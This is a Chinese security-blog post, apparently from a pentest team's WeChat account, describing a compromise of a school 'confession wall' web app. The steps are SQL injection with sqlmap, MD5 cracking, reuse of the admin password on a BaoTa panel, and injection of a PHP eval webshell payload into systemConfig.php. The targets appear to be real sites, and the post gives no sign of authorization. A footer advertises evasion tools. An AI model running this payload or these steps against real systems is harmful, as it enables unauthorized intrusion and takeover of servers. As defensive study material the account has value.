由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

在一次FOFA探索之旅中，偶然间发现很多学校使用了“XX表白墙”，如下所示：

扫一下这个站的端口，只发现一个宝塔登陆页面

开始对表白墙系统进行常规渗透，先尝试了SQL注入，发现' "等都被转义了，尝试编码以及宽字节注入未果

后台爆破了一波未果，正当我觉得没搞头的时候，Burp的xia SQL插件给我返回了一个“You have an error in your SQL syntax”（WTF ?，这个故事告诉我们，SQL注入多试几个点，有些功能可能过滤不全）

直接sqlmap一把梭

可惜不是dba，不管了，先把后台密码搞到

这md5真够让人无语的

进入后台，文件上传没有绕过去（白名单），我是真的菜啊

等等，刚才不是发现了一个宝塔登陆界面吗？试试同口令。。。呵呵呵

先看看网站源码，发现systemConfig.php中的内容有点眼熟

这不就是后台的基本设置吗，笑死，没想通为什么开发要把这些信息保存在php中

有经验的老师傅可能已经知道接下来怎么做了

既然这些参数是可控的，那直接插入php代码进去不就getshell了

经过一番尝试（我就尝试了两次），在基本设置中任意位置插入payload：\');@eval($_POST[x]);//

点击保存，再次查看网页源码，发现php一句话插入成功

然而，所有的页面都引入了systemConfig.php，因此在任意位置都可以执行webshell

现在执行一下phpinfo试试水

坚守底线，点到为止

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！